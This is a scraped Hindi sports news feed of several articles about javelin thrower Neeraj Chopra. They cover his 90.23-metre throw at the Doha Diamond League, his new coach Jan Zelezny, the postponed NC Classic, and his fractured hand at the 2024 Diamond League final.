नीरज चोपड़ा का चौथा थ्रो उतना अच्छा नहीं रहा और इसमें उन्हें 80.56 मीटर की दूरी मिली. नीरज का पांचवां प्रयास फाउल रहा. जबकि छठे प्रयास में उन्होंने 88.20 मीटर की दूरी हासिल की.

दोहा डायमंड लीग में नीरज चोपड़ा के सामने एंडरसन पीटर्स (ग्रेनाडा), जैकब वाडलेच (चेक गणराज्य), जूलियन वेबर और मैक्स डेहनिंग (दोनों जर्मनी), जूलियस येगो (केन्या), रोड्रिक डीन (जापान) जैसे खिलाड़ियों की चुनौती थी. पेरिस ओलंपिक 2024 के स्वर्ण पदक विजेता पाकिस्तान के अरशद नदीम ने दोहा डायमंड लीग में भाग नहीं लिया.

इससे पहले नीरज चोपड़ा का सर्वश्रेष्ठ निजी प्रदर्शन 89.94 मीटर था. यह थ्रो उन्होंने साल 2022 में स्टॉकहोम डायमंड लीग में किया था. नीरज चोपड़ा ने सबसे पहले 2018 में दोहा डायमंड लीग में भाग लिया था और चौथे स्थान पर रहे थे. उन्होंने 2023 में यहां पहला स्थान हासिल किया, जबकि 2024 में वो दूसरे स्थान पर रहे.

चोपड़ा ने पार किया 90 मीटर का मार्क बोले अब मेरा अगला लक्ष्य..

आज से ठीक 9 महीने 7 दिन पहले 9 अगस्त 2024 को नीरज ने पेरिस ओलिंपिक में सिल्वर जीतने के बाद कहा था, 'आज मेरा दिन नहीं था। मुझे लग रहा था कि आज वो दिन है, जब 90 मीटर का थ्रो आएगा, लेकिन भगवान को कुछ और मंजूर था।' 9 महीने 7 दिन में नीरज ने 90 मीटर की बाधा कैसे पार कर ली

क्यों खास है 90 मीटर मार्क?

जेवलिन में अब तक के इतिहास में दुनिया भर 25 जेवलिन थ्रोअर ही 90 मीटर भाला फेंक सके हैं। एशिया में ऐसा करने वाले 3 प्लेयर ही हैं। इनमें नीरज के अलावा, पाकिस्तान के अरशद नदीम और चीनी ताइपे चाओ-त्सुन चेंग शामिल हैं। 2024 ओलिंपिक से पहले चेंग ही यह कारनामा कर सके थे।

1. वर्ल्ड रिकॉर्ड बनाने वाले जान जेलेजनी से ट्रेनिंग ली नीरज ने वर्ल्ड रिकॉर्ड होल्डर जान जेलेजनी से ट्रेनिंग लेने का फैसला लिया। उन्होंने नवंबर 2024 में चेक गणराज्य के जेलेजनी को अपना कोच बनाया। दोनों ने फरवरी महीने में कोचिंग शुरू की। जेलेजनी के नाम भाला फेंक का वर्ल्ड रिकॉर्ड है, उन्होंने 1996 में 98.48 मीटर भाला फेंका था। वे तीन ओलिंपिक में गोल्ड मेडल जीत चुके हैं।

जर्मन बायोमैकेनिक्स विशेषज्ञ डॉ क्लॉस बार्टोनिट्ज की कोचिंग में नीरज ने 2020 में टोक्यो ओलिंपिक में गोल्ड मेडल जीता। उसके बाद पेरिस में सिल्वर मेडल भी हासिल किया। इस बीच नीरज डायमंड लीग, वर्ल्ड चैंपियनशिप जैसे टूर्नामेंट में मेडल जीतते रहे, लेकिन 90 मीटर मार्क हासिल नहीं कर सके।

2. नए कोच ने गलतियां बताईं, तकनीकी बदलाव किए नीरज ने एक इंटरव्यू में कहा था कि कोच जेलेजनी ने पेरिस ओलिंपिक के वीडियो देखकर उन्हें 2 कमियां बताई थीं। उन्होंने नीरज की तकनीक में कुछ बदलाव भी किए थे, जिनका जिक्र नीरज ने एक इंटरव्यू में किया था।

3. जेलेजनी के बताए डॉक्टर से इलाज करवाया जेलेजनी से जुड़ने के बाद नीरज ने अपनी कमर की चोट के लिए जेलेजनी के बताए गए डॉक्टर से सलाह ली। नीरज ने एक इंटरव्यू में कहा था, 'मैं अपनी चोट के कारण अपनी तकनीक में 100 प्रतिशत नहीं दे पा रहा था। मैं प्राग में जेलेजनी के डॉक्टर के पास गया और उन्होंने कुछ एक्सरसाइज बताई।'

नीरज काफी समय से कमर की चोट से परेशान थे। उन्होंने माना कि वे चोट की वजह से पेरिस ओलिंपिक में अपना बेस्ट प्रदर्शन नहीं कर पाए। सिल्वर जीतने के बाद नीरज ने कहा था- 'मुझे लगता है कि मैं फाइनल में अधिक दूरी तक थ्रो कर सकता था। भले ही मानसिक रूप से मैं तैयार था, लेकिन मेरा शरीर मेरी कमर की चोट के बढ़ने के डर की वजह से पीछे हट रहा था। मैं ट्रैक पर रनअप के साथ संघर्ष कर रहा था, जिसके कारण मेरे कई अटेम्ट फाउल रहे।'

4. ट्रेनिंग के लिए जल्दबाजी में शादी, रिसेप्सन भी टाला नीरज चोपड़ा को अपनी ट्रेनिंग की शुरुआत करने के लिए जल्दबाजी में शादी करनी पड़ी। इतना ही नहीं, रिसेप्शन को भी टालना पड़ा। नीरज ने अपनी सीक्रेट शादी के सवाल पर एक चैनल से कहा था- 'मुझे ट्रेनिंग करनी थी, इस वजह से जल्दी में शादी की।'

नीरज ने कहा था- ऐसा नहीं कि मेरी शादी की खबर किसी को नहीं थी। काफी लोगों को जानकारी थी, जिसमें फैमिली और क्लोज फ्रेंड भी थे। हम सभी को अच्छे तरीके से इनवाइट करना चाहते थे। वह ऐसा टाइम था कि मुझे ट्रेनिंग शुरू करनी थी। मेरा कॉम्पिटिशन का सीजन शुरू होने वाला था। पहले था कि सीजन के बाद ट्रेनिंग स्टार्ट करूंगा, लेकिन फिर भी सबको बुलाने में काफी टाइम लग जाता।

आखिर में जानिए नीरज ने क्या कहा?

मेरा सर्वश्रेष्ठ प्रदर्शन आना अभी बाकी है 90 मीटर से ज्यादा भाला फेंकने के बाद नीरज चोपड़ा ने दोहा में प्रेस कॉन्फ्रेंस में कहा कि उनका सर्वश्रेष्ठ प्रदर्शन अभी आना बाकी है। फैंस इस साल उनसे 90 मीटर की और थ्रो की उम्मीद कर सकते हैं।

दोहा डायमंड लीग में मेन्स जैवलिन थ्रो का परिणाम

दोहा डायमंड लीग में नीरज चोपड़ा का प्रदर्शन:
पहला प्रयास- 88.44 मीटर
दूसरा प्रयास- फाउल
तीसरा प्रयास- 90.23 मीटर
चौथा प्रयास- 80.56 मीटर
पांचवां प्रयास- फाउल
छठा प्रयास- 88.20 मीटर

दोहा डायमंड लीग में किशोर जेना का प्रदर्शन:
पहला प्रयास- 68.07 मीटर
दूसरा प्रयास- 78.60 मीटर
तीसरा प्रयास- फाउल
चौथा प्रयास- 74.80 मीटर
पांचवां प्रयास- 77.28 मीटर
छठा प्रयास- NA

दोहा डायमंड लीग में सभी 11 खिलाड़ियों के बेस्ट थ्रो-
1. जूलियन वेबर (जर्मनी)- 91.06 मीटर
2. नीरज चोपड़ा (भारत)- 90.23 मीटर
3. एंडरसन पीटर्स (ग्रेनाडा)- 85.64 मीटर
4. केशोर्न वाल्कॉट (त्रिनिदाद एंड टोबैगो)- 84.65 मीटर
5. मोहम्मद हुसैन अहमद समेह (मिस्र)- 80.95 मीटर
6. ओलिवर हेलैंडर (फिनलैंड)- 79.61 मीटर
7. जैकब वाडलेच (चेक गणराज्य)- 79.06 मीटर
8. किशोर जेना (भारत)- 78.60 मीटर
9. जूलियस येगो (केन्या)- 78.52 मीटर
10. रोड्रिक जी. डीन (जापान)- 76.49 मीटर
11. मैक्स डेहनिंग (जर्मनी)- 74.00 मीटर

दोहा डायमंड लीग में भारत की ओर से राष्ट्रीय रिकॉर्डधारी गुलवीर सिंह और पारुल चौधरी क्रमश: पुरूष और महिलाओं की 5000 मीटर दौड़ एवं 3000 मीटर स्टीपलचेज में उतरे. गुलवीर सिंह ने मेन्स 5000 मीटर रेस में 9वां हासिल किया. जबकि पारुल वूमेन्स 3000 मीटर स्टीपलचेज में छठे नंबर पर रहीं.

]]>
नीरज चोपड़ा क्लासिक जैवेलिन थ्रो इवेंट को अनिश्चितकाल के स्थगित कर दिया गया https://pratyushaashakinayikiran.com/?p=155205 Sat, 10 May 2025 07:56:00 +0000 https://pratyushaashakinayikiran.com/?p=155205 बेंगलुरु

भारत और पाकिस्तान के बीच तनाव का असर खेल जगत पर देखने को मिल रहा है. इन दोनों देशों के बीच लगातार हो रहे हमलों के चलते पहले इंडियन प्रीमियर लीग (आईपीएल 2025) को और फिर पाकिस्तान सुपर लीग (पीएसएल 2025) को स्थगित कर दिया गया. अब भारत-पाक तनाव का असर अन्य खेलों पर भी पड़ता हुआ नजर आ रहा है.

दरअसल, भारत के स्टार भाला फेंक खिलाड़ी और दो बार के ओलंपिक पदक विजेता नीरज चोपड़ा को भी झटका लगा है. भारत-पाकिस्तान के बीच युद्ध जैसी स्थिति के बीच जैवलिन थ्रो का एक इवेंट स्थगित कर दिया गया है. 24 मई को बेंगलुरु के श्री कांतीरवा स्टेडियम में होने वाली नीरज चोपड़ा क्लासिक 2025 भाला फेंक प्रतियोगिता को स्थगित करने की घोषणा की है. इसकी जानकारी सोशल मीडिया पर पोस्ट कर दी गई है.

नीरज चोपड़ा क्लासिक 2025 भारत की पहली अंतरराष्ट्रीय भाला फेंक प्रतियोगिता होने वाली थी जिसे अब करारा झटका लगा है. इन दोनों देशों के बीच पैदा हुए इन हालातों के बाद इस टूर्नामेंट को सस्पेंड करने का फैसला भारत सरकार द्वारा लिया गया है. इस टूर्नामेंट का आयोजन नीरज चोपड़ा जेएसडब्ल्यू स्पोर्ट्स और एथलेटिक्स फेडरेशन ऑफ इंडिया (एएफआई) के सहयोग से कर रहे थे. इसमें नीरज चोपड़ा के अलावा थॉमस रोहलर, एंडरसन पीटर्स समेत कई और अन्य ओलंपिक पदक विजेता भाग लेने वाले थे.

चोपड़ा ने इंस्टाग्राम पर पोस्ट कर इसकी जानकारी दी और लिखा, 'मौजूदा स्थिति को देखते हुए नो क्लासिक का उद्घाटन संस्करण अगली सूचना तक स्थगित कर दिया गया है. यह निर्णय सावधानीपूर्वक विचार और परामर्श के बाद लिया गया है जिसमें एथलीटों, हितधारकों और व्यापक समुदाय की भलाई को सर्वोच्च प्राथमिकता दी गई है. हम खेल की एकीकृत शक्ति में विश्वास करते हैं. लेकिन, इस महत्वपूर्ण क्षण में, राष्ट्र के साथ मजबूती से खड़े रहना सबसे महत्वपूर्ण है. इस समय हमारा सारा आभार और विचार केवल हमारे सशस्त्र बलों के साथ है, जो हमारे राष्ट्र के लिए सबसे आगे हैं. एनसी क्लासिक के लिए एक संशोधित कार्यक्रम नियत समय में प्रदान किया जाएगा. जय हिंद'.

बता दें कि, 22 अप्रैल को हुए पहलगाम आतंकी हमले के बाद भारत ने पाकिस्तान और पाक अधिकृत जम्मू-कश्मीर में आतंकी ढांचे पर सटीक मिसाइल हमले किए. पंजाब के पठानकोट, अमृतसर, जालंधर, होशियारपुर, मोहाली और केंद्र शासित प्रदेश चंडीगढ़ के कई जिलों में ब्लैकआउट लागू किया गया. जम्मू में हवाई हमले की चेतावनी और विस्फोट जैसी आवाजों की रिपोर्ट के बाद ये कदम उठाए गए. इसके बाद से पाकिस्तान लगातार भारत के अलग-अलग राज्यों के अलग-अलग स्थानों पर लगातार हमले कर रहा है. इन दोनों देशों के बीच लगातार तनाव की स्थिति बनी हुई है.

]]>
जैवलिन थ्रोअर नीरज चोपड़ा ने विश्व रिकॉर्ड धारक को बनाया नया कोच https://pratyushaashakinayikiran.com/?p=96389 Sun, 10 Nov 2024 09:56:00 +0000 https://pratyushaashakinayikiran.com/?p=96389 नई दिल्ली
लगातार दो ओलंपिक में पदक जीतने वाले स्टार जैवलिन थ्रोअर नीरज चोपड़ा ने अपने करियर में एक रोमांचक नए अध्याय की शुरुआत की। उन्होंने जैवलिन थ्रो के दिग्गज जान जेलेज्नी के साथ एक नई पारी की शुरुआत की है।

तीन बार के ओलंपिक चैंपियन और मौजूदा विश्व रिकॉर्ड धारक जान जेलेज्नी लंबे समय से चोपड़ा के आदर्श रहे हैं और अब वह कोच के रूप में उनका मार्गदर्शन करेंगे। दरअसल, नीरज चोपड़ा अभी तक जर्मन कोच क्लॉस बार्टोनिएट्ज के साथ काम कर रहे थे, लेकिन क्लॉस बार्टोनिएट्ज ने हाल ही में कोचिंग से संन्यास लिया है।

चोपड़ा ने कहा, “मैं हमेशा से जान की तकनीक और सटीकता का मुरीद रहा हूं। मैंने उनके कई वीडियो देखे और उससे बहुत कुछ सीखा। वह इतने वर्षों तक खेल में सर्वश्रेष्ठ रहे और मेरा मानना है कि उनके साथ काम करना अमूल्य होगा क्योंकि हमारे थ्रो करने की शैली काफी मेल खाती है। उनका ज्ञान बेजोड़ है और भविष्य में उनका मार्गदर्शन मेरे लिए अहम होगा। अपने करियर में अगले स्तर की ओर बढ़ने के लिए जान का मेरे साथ होना सम्मान की बात है।”

जान जेलेज्नी ने कहा, “मैंने कई साल पहले ही नीरज के बारे में एक बेहतरीन प्रतिभा के रूप में बात की है। जब मैंने उन्हें उनके करियर की शुरुआत में देखा था, तो मुझे शीर्ष परिणामों के लिए बहुत संभावनाएं महसूस हुईं। मैंने यह भी कहा कि अगर मुझे चेकिया के बाहर से किसी को कोचिंग देनी पड़े, तो मेरी पहली पसंद नीरज होंगे। मुझे उनकी कहानी पसंद है और मुझे उनमें बहुत संभावनाएं नज़र आती हैं, क्योंकि वह युवा हैं और सुधार करने में सक्षम हैं। कई एथलीट कोचिंग के लिए मुझसे संपर्क कर रहे हैं, इसलिए मेरे लिए यह काम करना बहुत सम्मान की बात है। हम एक-दूसरे को और करीब से जान रहे हैं और दक्षिण अफ्रीका में एक पारंपरिक शीतकालीन शिविर में व्यक्तिगत रूप से शुरुआत करेंगे। मुझे उनकी प्रगति पर विश्वास है, खासकर तकनीकी पहलू में, ताकि वह मुख्य चैंपियनशिप में शीर्ष स्थान हासिल करना जारी रख सकें।”

1992, 1996 और 2000 ओलंपिक खेलों में स्वर्ण पदक विजेता जेलेज्नी के नाम अब तक के दस सर्वश्रेष्ठ थ्रो में से पांच हैं, और उन्होंने 1996 में जर्मनी में 98.48 मीटर के वर्तमान रिकॉर्ड को हासिल करने के दौरान चार बार विश्व रिकॉर्ड तोड़ा था। जब चोपड़ा ने टोक्यो 2020 में स्वर्ण पदक जीता था, तब जान जेलेज्नी दोनों अन्य पदक विजेताओं जैकब वाडलेज (रजत) और विटेजस्लाव वेस्ली (कांस्य) के कोच थे। उन्होंने दो बार की ओलंपिक चैंपियन और तीन बार की विश्व चैंपियन बारबोरा स्पोटाकोवा को भी कोचिंग दी है।

 

]]>
नीरज चोपड़ा ने टूटे हाथ के साथ टूर्नामेंट में उतरे और किया कमाल! https://pratyushaashakinayikiran.com/?p=71258 Mon, 16 Sep 2024 12:56:00 +0000 https://pratyushaashakinayikiran.com/?p=71258 नईदिल्ली
पेरिस ओलंपिक में जेवेलिन थ्रो में भारत को सिल्वर मेडल दिलाने वाले नीरज चोपड़ा के लिए डायमंड लीग का फाइनल मुकाबला भी निराशाजनक रहा। पेरिस ओलंपिक की तरह ही नीरज चोपड़ा ने डायमंड लीग का फाइनल मुकाबला भी दूसरे स्थान पर रहते हुए खत्म किया।

नीरज चोपड़ा डायमंड लीग 2024 फाइनल में अपनी उम्मीदों पर खरा नहीं उतर सके। नीरज फाइनल में दूसरे स्थान पर रहे।हालांकि इस दौरान गोल्डन बॉय के हाथों में फैक्टर हो रखा था जिसका खुलासा उन्होंने इंस्टाग्राम पर पोस्ट शेयर कर किया।

1 सेंटीमीटर से चूके नीरज चोपड़ा

डायमंड लीग के फाइनल में नीरज चोपड़ा सिर्फ 1 सेंटीमीटर से गोल्ड मेडल जीतने से चूक गए। पेरिस ओलंपिक 2024 में सिल्वर मेडल जीतने वाले नीरज ने डायमंड लीग 2024 फाइनल में 87.86 मीटर का बेस्ट थ्रो फेंका और रजत पदक जीतने में कामयाब रहे। ग्रेनाडा के एंडरसन पीटर्स ने 87.87 मीटर थ्रो फेंककर गोल्ड मेडल पर कब्जा किया।

नीरज चोपड़ा ने शेयर किया टूटे हाथ का एक्स-रे

26 साल के नीरज चोपड़ा ने इंस्टाग्राम पर अपने फैक्टर हाथों की तस्वीर शेयर करते हुए लिखा, ‘सोमवार को अभ्यास के दौरान मैं चोटिल हो गया था और ‘एक्स-रे’ से पता चला कि मेरे बाएं हाथ की (चौथी मेटाकार्पल) हड्डी में फ्रैक्चर है। ये मेरे लिए एक और दर्दनाक चुनौती थी लेकिन अपनी टीम की मदद से मैं ब्रसेल्स में भाग लेने में सफल रहा। यह साल का अंतिम टूर्नामेंट था। मैं अपनी ही उम्मीदों पर खरा नहीं उतर सका। लेकिन मुझे लगता है कि यह एक ऐसा सत्र था जिसमें मैंने बहुत कुछ सीखा। अब मैं पूरी तरह से फिट होकर वापसी कर खेलने के लिए तैयार हूं।’

नीरज चोपड़ा इस दौरान फिटनेस की समस्याओं से जूझ रहे हैं। नीरज चोपड़ा ने पोस्ट में आगे लिखा कि ‘2024 सत्र समाप्त हो गया है तो मैंर,  साल भर में सीखी गई सभी चीजों को देखता हूं जिसमें सुधार, असफलताएं, मानसिकता और बहुत कुछ शामिल है। मैं आप सभी को आपके प्रोत्साहन के लिए धन्यवाद देना चाहता हूं। 2024 ने मुझे एक बेहतर एथलीट और इंसान बनाया है। 2025 में मिलते हैं।’
नीरज चोपड़ा ने पेरिस ओलंपिक में जीता था सिल्वर

नीरज चोपड़ा के हाथ में फैक्चर होने के बाद भी उन्होंने इस साल कई प्रतियोगिताओं में शानदार प्रदर्शन किया। जिसपर हर भारतीय को फक्र होगा। नीरज चोपड़ा ने हाल ही में समाप्त हुए पेरिस ओलंपिक में शानदार प्रदर्शन करते हुए 89.45 मीटर का थ्रो फेंककर सिल्वर मेडल पर कब्जा जमाया था। पाकिस्तान के अरशद नदीम ने रिकॉर्डतोड़ 92.97 मीटर थ्रो फेंककर गोल्ड मेडल अपने नाम किया था। एंडरसन पीटर्स तीसरे स्थान पर रहे थे।

 

]]>